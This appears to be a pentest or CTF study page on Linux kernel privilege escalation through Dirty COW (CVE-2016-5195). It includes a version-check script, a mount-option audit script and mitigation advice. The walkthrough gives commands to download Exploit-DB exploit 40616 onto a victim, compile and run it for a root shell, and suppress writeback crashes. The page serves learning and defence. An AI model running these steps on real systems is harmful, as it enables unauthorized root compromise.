Kernel Exploits
Dirty Cow!
Enumeration
Enumerate kernel version and google it:
uname -a
Or transfer linux-exploit-suggester.sh to the victim machine and run it. If the keyword "dirtycow" appears in the output, try it. If you cannot get files onto the target, the script also accepts the kernel version string (its --uname option), so you can run it on your own machine against the output of uname -a.
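Because distro kernels backport fixes without changing the upstream version number, a version check is only a first filter before running linux-exploit-suggester or the exploit itself. The following script is an added example (not part of the original page or of linux-exploit-suggester) that turns the uname -r string into a Dirty COW verdict. It encodes the three first-fixed upstream releases announced with CVE-2016-5195 (4.8.3, 4.7.9, 4.4.26) and the 2.6.22 start of the affected range; the script name dirtycow_check.sh and the sample version strings are assumptions for the demonstration.

```shell
#!/bin/sh
# dirtycow_check.sh: heuristic Dirty COW (CVE-2016-5195) check on a kernel version string.
# Affected range: 2.6.22 <= version < first fixed release of its stable series.
# Upstream fixes: 4.8.3, 4.7.9, 4.4.26 (October 2016). Other longterm branches also
# received backports that are not encoded here, and distro kernels (e.g. Ubuntu's 4.4.0-NN)
# fix the bug without bumping the upstream version, so "possibly-vulnerable" means
# "check the distro changelog or run linux-exploit-suggester", not "exploit it blindly".

# to_num VERSION -> integer major*1000000 + minor*1000 + patch, ignoring distro suffixes
to_num() {
    v=${1%%-*}                       # "4.4.0-21-generic" -> "4.4.0"
    v=${v%%+*}                       # "4.4.0+"           -> "4.4.0"
    major=${v%%.*}
    rest=${v#*.};  [ "$rest" = "$v" ] && rest=0
    minor=${rest%%.*}
    patch=${rest#*.}; [ "$patch" = "$rest" ] && patch=0
    patch=${patch%%[!0-9]*}          # "0rc1" -> "0"
    echo $(( ${major:-0} * 1000000 + ${minor:-0} * 1000 + ${patch:-0} ))
}

# dirtycow_status VERSION -> not-affected | patched-upstream | possibly-vulnerable
dirtycow_status() {
    n=$(to_num "$1")
    if [ "$n" -lt "$(to_num 2.6.22)" ]; then
        echo not-affected             # the racy code path was introduced in 2.6.22
        return 0
    fi
    major=$(( n / 1000000 ))
    minor=$(( n / 1000 % 1000 ))
    case "$major.$minor" in
        4.8) fixed=$(to_num 4.8.3)  ;;
        4.7) fixed=$(to_num 4.7.9)  ;;
        4.4) fixed=$(to_num 4.4.26) ;;
        # Every series after 4.8 shipped with the fix; older EOL series (e.g. 4.5, 4.6)
        # never got it upstream, so anything below 4.8.3 outside the table stays flagged.
        *)   fixed=$(to_num 4.8.3)  ;;
    esac
    if [ "$n" -ge "$fixed" ]; then
        echo patched-upstream
    else
        echo possibly-vulnerable
    fi
}

# Usage: sh dirtycow_check.sh [kernel-version]   (defaults to the running kernel)
case "$0" in
    *dirtycow_check.sh) dirtycow_status "${1:-$(uname -r)}" ;;
esac
```

On a stock Ubuntu 16.04 box `uname -r` gives something like 4.4.0-21-generic, which the script reports as possibly-vulnerable; whether the -21 build actually carries the fix is exactly what the distro changelog (or linux-exploit-suggester's output) has to settle.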
Dirty Cow
Dirty Cow (CVE-2016-5195) is a race condition in the kernel's copy-on-write handling of private memory mappings: an unprivileged user can win the race and write into a read-only, root-owned file such as /etc/passwd or a setuid binary. It is the most commonly used kernel exploit in CTF-like environments. The downside is that a Dirty Cow attack, whether it fails or succeeds, may crash the victim machine when the kernel later writes the dirtied pages back. That is unacceptable in a real-world pentest, so do not run it against a production host without explicit agreement.
Suppose we want to use exploit 40616 from Exploit-DB. On the victim machine, change to the /tmp directory:
cd /tmp
Download it (the target needs outbound HTTPS for this; otherwise fetch it on your own machine and transfer the file):
wget https://www.exploit-db.com/download/40616 -O cowroot.c
Following the instructions in the source comments, uncomment the payload that matches the target's architecture (check it with uname -m) and compile it:
gcc cowroot.c -o cowroot -pthread
Execute the exploit:
./cowroot
Once you have the root shell, stop the kernel's periodic writeback of dirty pages, which is what tends to crash the box after the exploit (this file is only writable by root, so run it from the new shell):
echo 0 > /proc/sys/vm/dirty_writeback_centisecs
Cheat Code: Ubuntu 16.04 Privesc
A kernel exploit for this release works smoothly on many boxes.
Mitigation
A successful privilege escalation through a kernel exploit requires the following five conditions:
A vulnerable kernel
A working exploit
A way to transfer the exploit to the target
A way to compile the exploit (optional, since many exploits can be compiled on the attacker's machine, statically linked, and transferred as a binary for the target's architecture)
A way to execute the exploit
Condition 1 is removed by keeping the kernel patched (or by running a live-patching service), which is the primary mitigation; condition 2 is outside the defender's control. The ideas below target conditions 3, 4, and 5 as defense in depth. Each can be bypassed by a determined attacker, so they raise the cost of exploitation rather than prevent it:
Prevent transferring the exploit
Do not allow users to use FTP, TFTP, SMB, SCP, wget, or curl. Keep in mind that a shell alone is a transfer channel: bash's /dev/tcp, a base64 blob pasted into the terminal, or an interpreter such as Python or Perl will move a file just as well, so this only removes the convenient tools.
Remove compilation tools
Remove GCC, CC, and other development tools (including interpreters that are not needed in production). This only matters when the exploit cannot be compiled elsewhere, see condition 4.
Prevent exploit execution
Mount user-writable directories such as /tmp and /home on a separate file system with the noexec option (add nosuid and nodev while you are at it). /var/tmp and /dev/shm are writable by every user as well and need the same treatment, otherwise the attacker simply picks the directory you forgot. Note that noexec only blocks execve() of files on that mount; it does not stop "python exploit.py" or "bash exploit.sh", because the interpreter is what executes. For an existing executable that users should not run, set
chmod 700 <executable>
so that only its owner (normally root) can execute it.
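The Dirty Cow walkthrough above depends on cd /tmp, compile, run working, and the last mitigation is exactly the mount option that breaks that chain. The following audit script is an added example (not part of the original page) that reads /proc/mounts-formatted lines and reports, for each commonly user-writable directory, which of noexec, nosuid and nodev is missing. The sample mount table is constructed for offline testing and does not come from a real host; the directory list, the fstab line and the sizes in it are assumptions to adapt to your own hosts.

```shell
#!/bin/sh
# Audit user-writable mount points for the options that stop "download, compile, run".
# Input format is that of /proc/mounts: "<source> <target> <fstype> <options> 0 0".

# Directories an unprivileged user can normally write to, hence where exploits get dropped.
WRITABLE_DIRS="/tmp /var/tmp /dev/shm /home"

# Constructed sample (not captured from a real system): /tmp is hardened,
# /dev/shm and /home are not, /var/tmp has no mount of its own.
SAMPLE_MOUNTS='/dev/sda1 / ext4 rw,relatime,errors=remount-ro 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev,noexec,relatime 0 0
tmpfs /dev/shm tmpfs rw,nosuid,nodev 0 0
/dev/sda3 /home ext4 rw,relatime 0 0'

# has_opt OPTS OPT -> success if OPT is one of the comma-separated OPTS (exact match,
# so "noexec" does not match "noexecx" and "nodev" does not match "nodevmap")
has_opt() {
    case ",$1," in
        *",$2,"*) return 0 ;;
    esac
    return 1
}

# audit_mounts MOUNTS_TEXT
# Prints one line per directory in WRITABLE_DIRS:
#   <dir> ok                          noexec, nosuid and nodev all set
#   <dir> missing:<opt>[,<opt>...]    mounted, but hardening options absent
#   <dir> no-dedicated-mount          lives on its parent file system and inherits its options
audit_mounts() {
    mounts=$1
    for dir in $WRITABLE_DIRS; do
        # last matching entry wins, which is what a process sees when a path is over-mounted
        opts=$(printf '%s\n' "$mounts" | awk -v d="$dir" '$2 == d { o = $4 } END { if (o) print o }')
        if [ -z "$opts" ]; then
            echo "$dir no-dedicated-mount"
            continue
        fi
        missing=""
        for want in noexec nosuid nodev; do
            has_opt "$opts" "$want" || missing="${missing:+$missing,}$want"
        done
        if [ -z "$missing" ]; then
            echo "$dir ok"
        else
            echo "$dir missing:$missing"
        fi
    done
}

# audit_live: the same check against the running system
audit_live() {
    audit_mounts "$(cat /proc/mounts)"
}

# An /etc/fstab line that produces the hardened /tmp of the sample (size is an assumption):
#   tmpfs  /tmp  tmpfs  defaults,nosuid,nodev,noexec,size=512m  0  0
# /var/tmp is commonly handled with a bind mount of /tmp so it inherits the same options.
```

Running audit_mounts on the sample prints "/tmp ok", "/var/tmp no-dedicated-mount", "/dev/shm missing:noexec" and "/home missing:noexec,nosuid,nodev"; the no-dedicated-mount case is the one that is easy to overlook, because /var/tmp silently inherits the executable root file system. Remember the caveat from the text: noexec stops ./cowroot, not "python3 exploit.py", so pair it with patching rather than relying on it.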